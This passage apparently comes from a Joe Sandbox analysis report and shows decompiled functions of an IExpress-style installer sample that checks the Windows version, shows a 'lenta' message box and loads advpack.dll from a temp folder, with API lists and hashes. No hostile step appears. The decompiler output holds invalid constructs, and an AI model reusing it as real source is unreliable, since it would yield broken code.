				_t72 =  *0xa08004; // 0xe10713fe
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xa08184 = 1;
						 *0xa08180 = 1;
						L13:
						 *0xa09a40 = _t119;
						L14:
						__eflags =  *0xa08a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00A02A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00A02A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xa08a38 & 0x00000001;
											if(( *0xa08a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00A0681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00A067C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E00A028E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0xa09a40 = _t119;
                                                                                                                                                                                                                                            						 *0xa08184 = 1;
                                                                                                                                                                                                                                            						 *0xa08180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0xa09a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa08184 = _t135;
                                                                                                                                                                                                                                            							 *0xa08180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E00A044B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00A06CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a0395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03961
                                                                                                                                                                                                                                            0x00a03963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03969
                                                                                                                                                                                                                                            0x00a03969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03969
                                                                                                                                                                                                                                            0x00a03915
                                                                                                                                                                                                                                            0x00a03915
                                                                                                                                                                                                                                            0x00a0391b
                                                                                                                                                                                                                                            0x00a0391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0392d
                                                                                                                                                                                                                                            0x00a03933
                                                                                                                                                                                                                                            0x00a03938
                                                                                                                                                                                                                                            0x00a0393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03940
                                                                                                                                                                                                                                            0x00a03946
                                                                                                                                                                                                                                            0x00a0394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038f2
                                                                                                                                                                                                                                            0x00a03843
                                                                                                                                                                                                                                            0x00a03845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0384b
                                                                                                                                                                                                                                            0x00a0384d
                                                                                                                                                                                                                                            0x00a03883
                                                                                                                                                                                                                                            0x00a03885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0389a
                                                                                                                                                                                                                                            0x00a0389e
                                                                                                                                                                                                                                            0x00a0389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038a0
                                                                                                                                                                                                                                            0x00a038a0
                                                                                                                                                                                                                                            0x00a038a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038a4
                                                                                                                                                                                                                                            0x00a0384f
                                                                                                                                                                                                                                            0x00a03851
                                                                                                                                                                                                                                            0x00a03857
                                                                                                                                                                                                                                            0x00a0386e
                                                                                                                                                                                                                                            0x00a03877
                                                                                                                                                                                                                                            0x00a0387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03881
                                                                                                                                                                                                                                            0x00a03859
                                                                                                                                                                                                                                            0x00a0385c
                                                                                                                                                                                                                                            0x00a03862
                                                                                                                                                                                                                                            0x00a03866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a038f4
                                                                                                                                                                                                                                            0x00a038f4
                                                                                                                                                                                                                                            0x00a038f5
                                                                                                                                                                                                                                            0x00a038fb
                                                                                                                                                                                                                                            0x00a03901
                                                                                                                                                                                                                                            0x00a03901
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0390a
                                                                                                                                                                                                                                            0x00a0374b
                                                                                                                                                                                                                                            0x00a0374e
                                                                                                                                                                                                                                            0x00a0375c
                                                                                                                                                                                                                                            0x00a03764
                                                                                                                                                                                                                                            0x00a03769
                                                                                                                                                                                                                                            0x00a0376e
                                                                                                                                                                                                                                            0x00a03771
                                                                                                                                                                                                                                            0x00a0379c
                                                                                                                                                                                                                                            0x00a0379f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a037a3
                                                                                                                                                                                                                                            0x00a037a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a037a4
                                                                                                                                                                                                                                            0x00a03773
                                                                                                                                                                                                                                            0x00a03777
                                                                                                                                                                                                                                            0x00a03778
                                                                                                                                                                                                                                            0x00a0377f
                                                                                                                                                                                                                                            0x00a03781
                                                                                                                                                                                                                                            0x00a0378e
                                                                                                                                                                                                                                            0x00a0378e
                                                                                                                                                                                                                                            0x00a03794
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03794
                                                                                                                                                                                                                                            0x00a03783
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03785
                                                                                                                                                                                                                                            0x00a0378c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A03723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A039C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A039F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$lenta
                                                                                                                                                                                                                                            • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                            • Opcode ID: f35699b9df3693d55ca201ade935795bd1af3c131e4bf8b6c4b197ff85ade964
                                                                                                                                                                                                                                            • Instruction ID: b99d8a0381481445c5ba7bc733b68f2808b67e4a3bf996838cf3008798c3832a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f35699b9df3693d55ca201ade935795bd1af3c131e4bf8b6c4b197ff85ade964
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE91F472B0121C9FEF34CB15ED907AAB3B8AF85344F1541A9D989972D1D7718F82CB41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00A06495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00A01781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E00A0658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A064DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A064F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A06502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-875882553
                                                                                                                                                                                                                                            • Opcode ID: 4fa2c5822fba1fafbb6d2f86e39980843542066402b3ae8ff55c3fb7f664a162
                                                                                                                                                                                                                                            • Instruction ID: 3622de082d1def7a5c95abcbdcf7b8c87126b8da8274eab965e4e66f3778f0a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fa2c5822fba1fafbb6d2f86e39980843542066402b3ae8ff55c3fb7f664a162
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4901F930A0010CABE750DBA4EC49EEE7378EB64315F500295F585921D0DF70AE97CA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00A02773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A02A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A02A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00a0296f
                                                                                                                                                                                                                                            0x00a02974
                                                                                                                                                                                                                                            0x00a0298c
                                                                                                                                                                                                                                            0x00a02a20
                                                                                                                                                                                                                                            0x00a02a21
                                                                                                                                                                                                                                            0x00a02a27
                                                                                                                                                                                                                                            0x00a02a4c
                                                                                                                                                                                                                                            0x00a02a4f
                                                                                                                                                                                                                                            0x00a02a50
                                                                                                                                                                                                                                            0x00a02a53
                                                                                                                                                                                                                                            0x00a02a56
                                                                                                                                                                                                                                            0x00a02a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a029b2
                                                                                                                                                                                                                                            0x00a029b2
                                                                                                                                                                                                                                            0x00a029b5
                                                                                                                                                                                                                                            0x00a029bd
                                                                                                                                                                                                                                            0x00a029c3
                                                                                                                                                                                                                                            0x00a029cc
                                                                                                                                                                                                                                            0x00a029d5
                                                                                                                                                                                                                                            0x00a029d7
                                                                                                                                                                                                                                            0x00a029da
                                                                                                                                                                                                                                            0x00a029dd
                                                                                                                                                                                                                                            0x00a029df
                                                                                                                                                                                                                                            0x00a029ec
                                                                                                                                                                                                                                            0x00a029f8
                                                                                                                                                                                                                                            0x00a029fc
                                                                                                                                                                                                                                            0x00a029ff
                                                                                                                                                                                                                                            0x00a02a02
